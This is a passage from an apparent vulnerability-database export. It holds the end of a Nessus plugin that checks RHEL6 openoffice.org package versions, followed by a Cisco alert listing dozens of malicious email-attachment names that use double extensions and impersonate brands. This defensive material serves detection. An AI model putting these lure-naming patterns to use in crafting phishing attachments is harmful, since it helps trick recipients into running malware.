reference:\"openoffice.org-langpack-pa-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"openoffice.org-langpack-pl_PL-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"openoffice.org-langpack-pl_PL-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"openoffice.org-langpack-pl_PL-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"openoffice.org-langpack-pt_BR-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"openoffice.org-langpack-pt_BR-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"openoffice.org-langpack-pt_BR-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"openoffice.org-langpack-pt_PT-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"openoffice.org-langpack-pt_PT-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"openoffice.org-langpack-pt_PT-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"openoffice.org-langpack-ro-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"openoffice.org-langpack-ro-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"openoffice.org-langpack-ro-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"openoffice.org-langpack-ru-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"openoffice.org-langpack-ru-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"openoffice.org-langpack-ru-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"openoffice.org-langpack-sk_SK-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"openoffice.org-langpack-sk_SK-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"openoffice.org-langpack-sk_SK-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"openoffice.org-langpack-sl_SI-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"openoffice.org-langpack-sl_SI-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"openoffice.org-langpack-sl_SI-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"openoffice.org-langpack-sr-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"openoffice.org-langpack-sr-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"openoffice.org-langpack-sr-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"openoffice.org-langpack-ss_ZA-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"openoffice.org-langpack-ss_ZA-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"openoffice.org-langpack-ss_ZA-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"openoffice.org-langpack-st_ZA-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"openoffice.org-langpack-st_ZA-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"openoffice.org-langpack-st_ZA-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"openoffice.org-langpack-sv-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"openoffice.org-langpack-sv-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"openoffice.org-langpack-sv-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"openoffice.org-langpack-ta_IN-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"openoffice.org-langpack-ta_IN-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"openoffice.org-langpack-ta_IN-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"openoffice.org-langpack-te_IN-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"openoffice.org-langpack-te_IN-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"openoffice.org-langpack-te_IN-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"openoffice.org-langpack-th_TH-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"openoffice.org-langpack-th_TH-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"openoffice.org-langpack-th_TH-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"openoffice.org-langpack-tn_ZA-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"openoffice.org-langpack-tn_ZA-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"openoffice.org-langpack-tn_ZA-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"openoffice.org-langpack-tr_TR-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"openoffice.org-langpack-tr_TR-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"openoffice.org-langpack-tr_TR-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"openoffice.org-langpack-ts_ZA-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"openoffice.org-langpack-ts_ZA-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"openoffice.org-langpack-ts_ZA-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"openoffice.org-langpack-uk-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"openoffice.org-langpack-uk-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"openoffice.org-langpack-uk-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"openoffice.org-langpack-ur-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"openoffice.org-langpack-ur-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"openoffice.org-langpack-ur-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"openoffice.org-langpack-ve_ZA-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"openoffice.org-langpack-ve_ZA-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"openoffice.org-langpack-ve_ZA-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"openoffice.org-langpack-xh_ZA-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"openoffice.org-langpack-xh_ZA-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"openoffice.org-langpack-xh_ZA-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"openoffice.org-langpack-zh_CN-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"openoffice.org-langpack-zh_CN-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"openoffice.org-langpack-zh_CN-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"openoffice.org-langpack-zh_TW-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"openoffice.org-langpack-zh_TW-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"openoffice.org-langpack-zh_TW-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"openoffice.org-langpack-zu_ZA-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"openoffice.org-langpack-zu_ZA-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"openoffice.org-langpack-zu_ZA-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"openoffice.org-math-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"openoffice.org-math-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"openoffice.org-math-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"openoffice.org-math-core-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"openoffice.org-math-core-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"openoffice.org-math-core-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"openoffice.org-ogltrans-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"openoffice.org-ogltrans-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"openoffice.org-ogltrans-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"openoffice.org-opensymbol-fonts-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"openoffice.org-pdfimport-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"openoffice.org-pdfimport-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"openoffice.org-pdfimport-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"openoffice.org-presentation-minimizer-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"openoffice.org-presentation-minimizer-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"openoffice.org-presentation-minimizer-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"openoffice.org-presenter-screen-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"openoffice.org-presenter-screen-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"openoffice.org-presenter-screen-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"openoffice.org-pyuno-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"openoffice.org-pyuno-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"openoffice.org-pyuno-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"openoffice.org-report-builder-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"openoffice.org-report-builder-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"openoffice.org-report-builder-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"openoffice.org-rhino-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"openoffice.org-rhino-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"openoffice.org-rhino-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"openoffice.org-sdk-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"openoffice.org-sdk-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"openoffice.org-sdk-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"openoffice.org-sdk-doc-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"openoffice.org-sdk-doc-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"openoffice.org-sdk-doc-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"openoffice.org-testtools-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"openoffice.org-testtools-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"openoffice.org-testtools-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"openoffice.org-ure-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"openoffice.org-ure-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"openoffice.org-ure-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"openoffice.org-wiki-publisher-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"openoffice.org-wiki-publisher-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"openoffice.org-wiki-publisher-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"openoffice.org-writer-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"openoffice.org-writer-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"openoffice.org-writer-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"openoffice.org-writer-core-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"openoffice.org-writer-core-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"openoffice.org-writer-core-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"openoffice.org-xsltfilter-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"openoffice.org-xsltfilter-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"openoffice.org-xsltfilter-3.2.1-19.6.el6_0.5\")) flag++;\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"autocorr-af / autocorr-bg / autocorr-cs / autocorr-da / autocorr-de / etc\");\n }\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "ciscothreats": [{"lastseen": "2018-07-26T12:05:38", "bulletinFamily": "info", "cvelist": [], "description": "Medium\n\nAlert ID: \n\n24111\n\nFirst Published:\n\n2011 September 12 13:30 GMT\n\nLast Updated:\n\n2013 August 22 14:21 GMT\n\nVersion: \n\n95\n\n## \n\n Summary \n\n * Cisco Security has detected significant activity related to spam email messages that contain malicious attachments. The text in the email message attempts to convince the recipient to open the attachment and view the details. However, the _.zip_ attachment contains a malicious _.exe_ file that, when executed, attempts to infect the system with malicious code. \n \nEmail messages that are related to this threat (RuleID2970KVR, RuleID2970KVR_1, RuleID2970KVR_2, RuleID2970KVR_3, and RuleID2970) may contain any of the following files:\n\n> _photoq0857739080.zip_ \n_Photo_P0809201181992884.jpg_____.exe_ \n_quote.pdf.exe_ \n_quote.pdf.zip_ \n_54243162.pdf.zip_ \n_case.report.pdf.exe_ \n_Complaint.zip_ \n_file389892.pdf.exe_ \n_Report.Id.30512437.zip_ \n_report.pdf.exe_ \n_FAX_20121204_1929873988_27.zip_ \n_FAX_20121204_1929873988_27.pdf.exe_ \n_FAX_20121204_1354584611_27.zip_ \n_FAX_20121204_1354584611_27.pdf.exe_ \n_Vodafone-MMS-ID74892.zip_ \n_Vodafone-MMS.jpeg.exe_ \n_Secure_Message.zip_ \n_Secure_Message.pdf.exe_ \n_Encrypted_Message.zip_ \n_Encrypted_Message.pdf.exe_ \n_rapidfax-08B72DF79DF7.zip_ \n_BBB_SBQ_Form_UID.pdf.exe_ \n_REF 443367_JetstarFlightItinerary.pdf.zip_ \n_JetstarFlightItinerary.pdf.exe_ \n_Case #BXX7U55DUY.zip_ \n_BBB_Case.PDF.exe_ \n_BBB.COMPLAINT28162504.zip_ \n_Browser Settings for Internet Explorer 9.pdf.zip_ \n_Browser Settings for Internet Explorer 9.pdf..exe_ \n_Ticketek-Purchase-3221222430.zip_ \n_PDF-Ticketek-Purchase.pdf.exe_ \n_P-51480557.2340.pdf.zip_ \n_97682473.PDF.R341.pdf.exe_ \n_AmericanExpress-Online-Services-Notification.zip_ \n_AmericanExpress-Online-Services-Notification.pdf.exe_ \n_your booking Qantas.zip_ \n_your booking Qantas.pdf.exe_ \n_Turkcell Fatura Bildirimi.zip_ \n_Turkcell Fatura Bildirimi.pdf.exe_ \n_ZLHAKJJE.zip_ \n_DFFJ435DJ.JPG.exe_ \n_JESUEXNFJPG.zip_ \n_DH47SKK3.jpg.exe_ \n_Bilet_Alym_Onayy.pdf.zip_ \n_Bilet_Alym_Onayy.pdf.exe_ \n_picture_{SYBOL}.zip_ \n_picture_FPO83G.jpeg.exe_ \n_IBF0565389.pdf.zip_ \n_IBF9570364.PDF.exe_ \n_EFATURA_6604923009.zip_ \n_EFATURA_8700934219.pdf.exe_ \n_01-Fatura Bildirimi.PDF.exe_ \n_Fatura Bildirimi-01f.zip_ \n_Bilet Alym_Onayy.zip_ \n_Bilet Alym Onayy.pdf.exe_ \n_PO040213RETECTLLORDER.pdf.zip_ \n_PO040213RETECTLLORDER.pdf.exe_ \n_SunExpress-Bilet-Bilginiz.zip_ \n_SunExpress-Bilet-Bilginiz.pdf.exe_ \n_MMS VodafoneID66349.zip_ \n_MMS VodafoneID70091.jpg.exe_ \n_Digiturk-Fatura-6400422810.pdf.exe_ \n_Digiturk-Fatura-2102347130.zip_ \n_foto {SYBOL}.zip_ \n_foto 849832.jpg.exe_ \n_picture {SYBOL}.zip_ \n_picture 978063.jpg.exe_ \n_Scan_02-13-2013-7918386.zip_ \n_Scan_02-13-2013.pdf.exe_ \n_report_13022012.pdf.exe_ \n_Myfax_MCFID_3784982639476284.pdf.exe.zip_ \n_Myfax_MCFID_3784982639476284.pdf.exe_ \n_Scan_02-13-2013-1677880.zip_ \n_Turkcell_65800954386-000678543.pdf.exe_ \n_Aaaaaaaa_0000000000-000000000.zip_ \n_QANTAS7769043.pdf.exe_ \n_QANTAS0470881.zip_ \n_FuelCard-ebill6542151.PDF.zip_ \n_FuelCard-ebill7640027.PDF.exe_ \n_FuelCard-ebill5297077.PDF.zip_ \n_FuelCard-ebill7599300.PDF.exe_ \n_fedach_rprt_030413.PDF.exe_ \n_ADP_Invoice-66D8D15FFA.zip_ \n_adp_invoice_userID.pdf.exe_ \n_0784_415.pdf.zip_ \n_0784_415.pdf.exe_ \n_ReservationSYMBOL[7]}661.zip_ \n_ReservationFJRU7FJ3883.pdf.exe_ \n_AtlanticHotel Booking Confirmation.zip_ \n_AtlanticHotel Booking Confirmation.doc.exe_ \n_Flugladen_de Buchungsbedingungen.pdf.zip_ \n_Flugladen_de Buchungsbedingungen.pdf.exe_ \n_Travel Details - Itinerary.zip_ \n_Travel Details - Itinerary.pdf.exe_ \n_ADP-Invoice-1B92F16FB6.zip_ \n_ADP-Invoice-000FF.pdf.exe_ \n_40333513_{abcbig}.zip_ \n_86486784-f.jpeg.exe_ \n_Complaint_Vj462943496.zip_ \n_BBB_ComplaintReport_N89372947.doc.exe_ \n_Aaaaa_A0000000.zip_ \n_Order_N9923704028.doc.exe_ \n_CTP Green Slip Quote.zip_ \n_CTP Green Slip Quote.pdf.exe_ \n_TNT-NL-016891790-710354467-factuur.zip_ \n_TNT-NL-765593094-855874003-factuur.PDF.exe_ \n_Cover-More Travel Insurance.zip_ \n_Cover-More Travel Insurance.PDF.exe_ \n_MMS - 5HUAMVQ9.zip_ \n_MMS - KKLIFJBG5.JPEG.exe_ \n_Bank Invoice Docs.pdf.zip_ \n_Document.exe_ \n_MMS - 4LFT77VQ.zip_ \n_MMS - SD4AW3O0.jpg.exe_ \n_FedEx Shipment Notification.zip_ \n_FedEx Shipment Notification.pdf.exe_ \n_nice_surprise.jpg.zip_ \n_nice surprise.jpg.exe_ \n_MMS_Message 14632411.zip_ \n_MMS_Message 88740922.bmp.exe_ \n_617100R737958.zip_ \n_847590FJT65784.jpeg.img.exe_ \n_report0743696.PDF.exe_ \n_faktura_VAT_03_06_2013.PDF.scr_ \n_img 6267577318.zip_ \n_img-message_ 0987956404.jpeg.exe_ \n_Ihre_O2_Bestellung-0959708715.zip_ \n_Ihre_O2_Bestellung-8750058433.PDF.exe_ \n_image_085265097172.zip_ \n_image_9475683947534.jpeg.exe_ \n_Report_07340184.pdf.exe_ \n_Report_313342.pdf.exe_ \n_Report_00340184.pdf.exe_ \n_Fax details and transmission_report.zip_ \n_Fax details and transmission_report.doc.exe_ \n_Pic_THYL3DKHHH0.zip_ \n_Pic_JGYTHGD756EJFH90.jpg.exe_ \n_IncomingFax.pdf.exe_ \n_WellsFargo.reportphishing.zip_ \n_Wellsfargo_SecuredMessage-06.11.2013.pdf.exe_ \n_secure.pdf.zip_ \n_secure.pdf.exe_ \n_image LP5CWV67HV.zip_ \n_image DRJT4D45AS.jpeg.exe_ \n_Order Items.pdf.zip_ \n_Order Items.pdf.scr_ \n_Valuation.pdf.scr_ \n__G7EEYCJBD5EQ.zip_ \n__7654865S9876Y_.jpeg.exe_ \n_MMS Id BQ6ZDUSZ.zip_ \n_MMS ID FJSU754F2.jpeg.exe_ \n_Booking-order form1.zip_ \n_Booking-order form1.pdf.exe_ \n_CTP Green Slip Quote.zip_ \n_CTP Green Slip Quote.PDF.exe_ \n_e-Billing_factuur.zip_ \n_e-Billing_factuur08654.pdf.exe_ \n_Report_07344982.pdf.exe_ \n_VOUCHER_PRINT.zip_ \n_VOUCHER_PRINT.DOC .exe_ \n__5863222179.zip_ \n_0617487592.doc.exe_ \n_32907382_0000000000_K_20130628_I_13_1867.zip_ \n_85700433_0000000000_X_20130628_I_13_7750.pdf.exe_ \n_SCAN_HP_Digital_06192013.zip_ \n_SCAN_HP_Digital_06192013.pdf.exe_ \n_cstapleton_Invoice.zip_ \n_cstapleton_Invoice.pdf.exe_ \n_PostNL_P87UV489066.zip_ \n_PostNL_GJ88T995305.PDF.exe_ \n_MIAP511I_5329142_0001934810_ST493.zip_ \n_MIAP511I_5329142_0001934810_ST493.PDF.exe_ \n_Certificate 6082047.zip_ \n_Certificate 9850038.pdf.exe_ \n_SCAN_HP_Digital_03859274.zip_ \n_SCAN_HP_Digital_03859274.pdf.exe_ \n_Photo 11.07.2013 _8689993630.zip_ \n_Photo 11.07.2013 _0684468490.jpg.exe_ \n_SCAN_HP_Digital_07_11_2013.zip_ \n_HP Digital_001-4824329846923647496593278456932409569237498723498543569324690582374895.pdf.exe_ \n_samplepix134.PDF.zip_ \n_samplepix134.PDF.exe_ \n_Microsoft HUP - Ihren Produkt Key.zip_ \n_Microsoft HUP - Ihren Produkt Key.PDF.exe_ \n_IdentityForm.zip_ \n_IdentityForm.PDF.exe_ \n_Image 16.07.2013. 0431813230.zip_ \n_Image 16.07.2013. 1999486300.jpeg.exe_ \n_Photo _ 17.07.2013_ ID4847412983.zip_ \n_Photo _ 17.07.2013_ ID9775002633.jpeg.exe_ \n_Photo _ 19.07.2013_ ID0482661958.zip_ \n_Photo _ 19.07.2013_ ID0482661958.jpg.exe_ \n_mms_data_21-07-2013_99039884.zip_ \n_mms_data_21-07-2013_911106338.gif.exe_br /> _Docs_sturtzs.com.zip_ \n_Docs_22072013_PDF.PDF.exe_ \n_Photo_22_07_2013_ID659376522.jpeg.zip_ \n_Photo_22_07_2013_ID659376522.jpeg.exe_ \n_Facebook_Album Image_451600.zip_ \n_Facebook_Album Image_650032.jpeg \nfraudulent-report.html.zip \nfraudulent-report.html.749022.html.exe \nNachricht zu Ihrem DPD Paket.zip \nNachricht zu Ihrem DPD Paket.PDF.exe_ \n_data_mms_23-07-2013_84221132.zip \ndata_mms_23-07-2013_98500042.gif.exe _ \n_mms data 23.07,2013_09548811.zip \nmms data_23-07-2013_09548811.jpeg.exe_ \n_Send qoute.pdf.zip \nSend qoute.pdf.exe \nflight document upgrade.doc.zip \nflight document upgrade.doc.exe_ \n_order.xls.exe \nInvoice # AUG 12.zip \nInvoice # AUG 12.PDF.exe \nPaket 443838924829.zip \nPaket 759940328229.pdf.exe \nOrder Western Union Online FX 70059.pdf.exe \nOrder Western Union Online FX 86364.zip \njob27598-1.inv100128.sc-01.zip \njob27598-1.inv100128.sc-01.pdf.exe \nRG679921651994.zip \nRG859095867466.pdf.exe \nvodafone.it_AreaPrivati_Codice.zip \nvodafone.it_AreaPrivati_Codice.pdf.exe \nlist of 